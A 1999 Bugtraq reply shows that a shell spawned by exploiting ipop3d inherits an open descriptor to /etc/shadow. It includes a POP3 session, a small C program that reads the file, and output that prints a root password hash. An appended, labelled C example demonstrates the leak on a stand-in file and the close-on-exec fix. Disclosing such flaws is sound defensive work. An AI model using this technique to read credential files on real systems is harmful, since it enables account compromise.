Bugtraq mailing list archives

Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight


From: woloszyn () it pl (M.C.Mar)
Date: Thu, 8 Apr 1999 16:39:30 +0200


On Tue, 6 Apr 1999, Stefan Rompf wrote:

> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> > Exploited overflow in ipop3d could be used to gain superuser access (the
> > only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris setuid() manpage:
>
>     If the effective user ID of the process calling setuid()  is
>     the  super-user, the real, effective, and saved user IDs are
>     set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.

But, (un)fortunately when exploiting ipop3d I found something like this:

Grabarz:~emsi# lsof -n | grep 1190
sh        1190 emsi  cwd    DIR        8,1    1024        2 /
sh        1190 emsi  rtd    DIR        8,1    1024        2 /
sh        1190 emsi  txt    REG        8,1  279352    16324 /bin/bash
sh        1190 emsi  mem    REG        8,1   78828    30629 /lib/ld-linux.so.1.9.5
sh        1190 emsi  mem    REG        8,1   11493    79564 /lib/libtermcap.so.2.0.8
sh        1190 emsi  mem    REG        8,1  605044    79566 /lib/libc.so.5.4.33
[...]
sh        1190 emsi    3r   REG        8,1     598    24674 /etc/shadow

Shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits
the open fd :)

So we may do something like this:

emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC () CAC Washington EDU) at Fri, 9 Apr 1999 15:19:33 +0000 (   )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
#include <stdio.h>
#include <unistd.h>
int main(void)
{
        char buf[255];
        lseek(3,0,0);                  /* fd 3: /etc/shadow, inherited open from ipop3d */
        read(3,buf,255);               /* not NUL-terminated: hence the trailing garbage below */
        printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new¿¤þ^
`
bash$
bash$

That's only an example... It proves that exploiting ipop3d could be useful
to obtain root (or any other account) access and that the vulnerability
should be fixed.

P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (you lamer,
will you finally send me that txt you promised me? ;).

--
___________________________________________________________________________
M.C.Mar   An NT server can be run by an idiot, and usually is.   emsi () it pl
      "If you can't make it good, make it LOOK good." - Bill Gates
  Maybe this isn't the place, but M$ programs, for example, are veritable monuments to stupidity.
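
The descriptor leak the post demonstrates, and the fix a daemon author would apply, as an added example that is not code from the post or from ipop3d: a temporary file stands in for /etc/shadow, a real /bin/sh child is asked whether it can read the inherited descriptor, then every descriptor above stderr is marked close-on-exec (the daemon-side alternative is simply closing them before setuid()) and the child is asked again. Assumes a POSIX system with /bin/sh and a writable /tmp; the path and the record written are constructed.

```c
/* Added example, not code from the original post: a descriptor opened before
 * privileges are dropped survives setuid() and exec unless closed or CLOEXEC. */
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>
/* What a daemon should do before dropping privileges or spawning anything:
 * mark every open descriptor above stderr close-on-exec. Returns the count. */
int cloexec_all_above_stderr(int maxfd)
{
    int n = 0;
    for (int fd = 3; fd < maxfd; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags != -1 && fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0)
            n++;
    }
    return n;
}
/* Ask a real /bin/sh child whether it can read from fd: the post's situation
 * of a spawned shell using an inherited descriptor. Returns 1 if it can. */
int child_can_read_fd(int fd)
{
    char cmd[32];
    snprintf(cmd, sizeof cmd, "cat <&%d >/dev/null", fd);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int st = 0;
    waitpid(pid, &st, 0);
    return WIFEXITED(st) && WEXITSTATUS(st) == 0;
}
/* Returns 10*leak_before + leak_after, i.e. 10 when the hardening works. */
int demo(void)
{
    char path[] = "/tmp/shadow-demo-XXXXXX";              /* constructed stand-in */
    const char rec[] = "root:$placeholder$:10539:0:::::\n"; /* constructed record */
    int fd = mkstemp(path);
    if (fd < 0 || write(fd, rec, sizeof rec - 1) < 0) return -1;
    int before = child_can_read_fd(fd);                   /* inherited: 1 */
    cloexec_all_above_stderr(256);
    int after = child_can_read_fd(fd);                    /* closed at exec: 0 */
    close(fd); unlink(path);
    return before * 10 + after;
}
```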


